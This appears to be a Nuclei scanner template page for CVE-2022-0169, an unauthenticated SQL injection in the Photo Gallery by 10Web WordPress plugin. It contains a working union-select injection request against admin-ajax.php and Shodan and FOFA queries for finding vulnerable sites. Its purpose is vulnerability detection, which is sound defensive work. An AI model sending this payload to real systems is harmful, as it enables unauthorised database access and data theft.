Skip to content
Nuclei Templates

Photo Gallery by 10Web < 1.6.0 - SQL Injection

ID: CVE-2022-0169

Severity: critical

Author: ritikchaddha,princechaddha

Tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web

Description

Section titled “Description”

The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection

YAML Source

Section titled “YAML Source”
id: CVE-2022-0169


info:
  name: Photo Gallery by 10Web < 1.6.0 - SQL Injection
  author: ritikchaddha,princechaddha
  severity: critical
  description: |
    The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
  remediation: This is resolved in release 1.6.0.
  reference:
    - https://wpscan.com/vulnerability/0b4d870f-eab8-4544-91f8-9c5f0538709c
    - https://wordpress.org/plugins/photo-gallery/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0169
    - https://plugins.trac.wordpress.org/changeset/2672822/photo-gallery#file9
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0169
    cwe-id: CWE-89
    epss-score: 0.01246
    epss-percentile: 0.85214
    cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 10web
    product: photo_gallery
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/photo-gallery
    fofa-query: body=/wp-content/plugins/photo-gallery
    publicwww-query: "/wp-content/plugins/photo-gallery"
  tags: cve,cve2022,wpscan,wp,wp-plugin,wordpress,sqli,photo-gallery,10web
variables:
  num: "999999999"


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'


      - type: status
        status:
          - 200
# digest: 490a0046304402202f5cceb3233aa41a040b14916ab2282acd30ba45018020514f9f19f2becc5072022022c8b1969405d8a5583d53bf8de3c5e2df541822881ac11c633faab1d9615f81:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0169.yaml"

View on Github